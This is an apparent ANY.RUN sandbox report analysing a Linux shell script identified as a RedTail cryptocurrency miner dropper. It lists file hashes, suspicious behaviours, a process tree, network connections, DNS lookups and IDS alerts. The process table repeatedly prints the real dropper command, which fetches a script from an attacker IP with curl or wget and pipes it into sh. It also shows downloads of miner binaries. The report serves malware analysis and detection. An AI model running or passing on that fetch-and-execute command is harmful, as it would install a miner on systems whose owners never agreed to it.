download:

/sh

Full analysis: https://app.any.run/tasks/6203ccd6-0377-4f65-bad5-7bb85bad8fe1
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth.

Malware Trends Tracker     >>>
Analysis date: October 21, 2024, 15:52:33
OS: Ubuntu 22.04.2
Tags:
miner
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5:

DAFA22699DB6C9B0DFEB8B1962B82467

SHA1:

C504D770D1FF787D0B38CEED59C8947D1D122647

SHA256:

D5B55117F713A1A265DCAB0DC68CEB4A607069F3831BD2594AA1330D5D0EAC81

SSDEEP:

24:Iz2zSlLNpuAltrM35BFRDD6n0LY83H0tfhhp5wEliodZYDYc7QW:IyOlL9tonmzfvJlBZY6W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to the CnC server

      • .redtail (PID: 14060)

    • MINER has been detected (SURICATA)

      • .redtail (PID: 14060)

  • SUSPICIOUS

    • Reads /proc/mounts (likely used to find writable filesystems)

      • check-new-release-gtk (PID: 13966)
      • cat (PID: 13944)
      • .redtail (PID: 14059)

    • Executes the "rm" command to delete files or directories

      • sh (PID: 13942)
      • sh (PID: 13998)

    • Uses wget to download content

      • sh (PID: 13942)

    • Executes commands using command-line interpreter

      • update-notifier (PID: 13964)
      • sh (PID: 13911)
      • sh (PID: 13942)
      • .redtail (PID: 14060)

    • Potential Corporate Privacy Violation

      • wget (PID: 14056)
      • .redtail (PID: 14060)

    • Checks DMI information (probably VM detection)

      • .redtail (PID: 14059)
      • udevadm (PID: 14076)

    • Connects to the server without a host name

      • wget (PID: 14056)
      • wget (PID: 13990)

    • Modifies Cron jobs

      • sh (PID: 14062)

    • Crypto Currency Mining Activity Detected

      • .redtail (PID: 14060)

    • Removes file immutable attribute

      • sh (PID: 13998)

    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 14075)

    • Connects to unusual port

      • .redtail (PID: 14060)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
334
Monitored processes
115
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start sh no specs dash no specs snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs dash no specs sh no specs dash no specs cat no specs grep no specs awk no specs dash no specs whoami no specs find no specs systemctl no specs systemctl no specs systemctl no specs systemctl no specs update-notifier no specs sh no specs check-new-release-gtk dpkg no specs dpkg no specs lsb_release no specs lsb_release no specs lsb_release no specs lsb_release no specs uname no specs touch no specs dash no specs dd no specs rm no specs wget chmod no specs tracker-extract-3 no specs sh no specs systemctl no specs systemctl no specs chattr no specs chattr no specs grep no specs mv no specs chattr no specs chattr no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs chattr no specs grep no specs mv no specs chattr no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs chattr no specs grep no specs mv no specs rm no specs rm no specs rm no specs rm no specs rm no specs dash no specs grep no specs wget mv no specs chmod no specs .redtail no specs #MINER .redtail sh no specs sh no specs crontab no specs dash no specs crontab no specs sh no specs sh no specs sh no specs which no specs sh no specs which no specs .redtail no specs sh no specs iptables no specs modprobe no specs udevadm no specs

Process information

PID
CMD
Path
Indicators
Parent process
13911/bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep "/bin/shany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
13949
13912/bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep "/usr/bin/dashsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13913curl http://87.120.117.92/sh/snap/snapd/current/usr/bin/snapdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13926/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info/snap/snapd/20290/usr/lib/snapd/snap-seccompsnap
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13934/snap/snapd/20290/usr/lib/snapd/snap-confine --base core20 snap.curl.curl /usr/lib/snapd/snap-exec curl http://87.120.117.92/sh/snap/snapd/20290/usr/lib/snapd/snap-confine
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13935/snap/snapd/20290/usr/lib/snapd/snap-confine --base core20 snap.curl.curl /usr/lib/snapd/snap-exec curl http://87.120.117.92/sh/snap/snapd/20290/usr/lib/snapd/snap-confine
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13941/bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep "/usr/bin/dashsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13942sh -s apache.selfrep/usr/bin/shsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
13949
13943sh -s apache.selfrep/usr/bin/dashsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13944cat /proc/mounts/usr/bin/catdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
1
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
13966check-new-release-gtk/tmp/#6029334 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029335 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029359 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029364 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029378 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029379 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029381 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029987 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/tmp/#6029988 (deleted)text
MD5:
SHA256:
13966check-new-release-gtk/home/user/.cache/update-manager-core/meta-release-ltstext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
33
DNS requests
18
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.48:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
200
87.120.117.92:80
http://87.120.117.92/sh
unknown
unknown
473
NetworkManager
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
14056
wget
GET
200
87.120.117.92:80
http://87.120.117.92/x86_64
unknown
unknown
13990
wget
GET
200
87.120.117.92:80
http://87.120.117.92/clean
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
470
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.48:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
212.102.56.178:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
485
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
87.120.117.92:80
Yuri Jordanov Ltd.
BG
unknown
485
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
13966
check-new-release-gtk
91.189.91.48:443
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
13990
wget
87.120.117.92:80
Yuri Jordanov Ltd.
BG
unknown
14056
wget
87.120.117.92:80
Yuri Jordanov Ltd.
BG
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
  • 2a00:1450:4001:82a::200e
whitelisted
odrs.gnome.org
  • 212.102.56.178
  • 169.150.255.184
  • 207.211.211.27
  • 169.150.255.180
  • 195.181.170.18
  • 37.19.194.80
  • 195.181.175.41
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
whitelisted
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 185.125.190.98
  • 185.125.190.18
  • 185.125.190.49
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.98
  • 185.125.190.96
  • 91.189.91.49
  • 91.189.91.97
  • 185.125.190.17
  • 91.189.91.48
  • 185.125.190.48
whitelisted
46.100.168.192.in-addr.arpa
unknown
changelogs.ubuntu.com
  • 91.189.91.48
  • 185.125.190.17
  • 91.189.91.49
  • 185.125.190.18
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
whitelisted
moneroed.net
  • 80.94.92.146
  • 94.156.177.109
  • 80.94.92.140
  • 92.118.39.120
  • 80.94.92.136
  • 80.94.92.147
  • 80.94.92.135
  • 80.94.92.149
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] The user name associated in PS.Script has been detected
14056
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
14060
.redtail
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 326
14060
.redtail
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 210
14060
.redtail
Crypto Currency Mining Activity Detected
MINER [ANY.RUN] CoinMiner Agent CnC Initial Connection
14060
.redtail
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
14060
.redtail
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
14060
.redtail
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
14060
.redtail
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
1 ETPRO signatures available at the full report
No debug info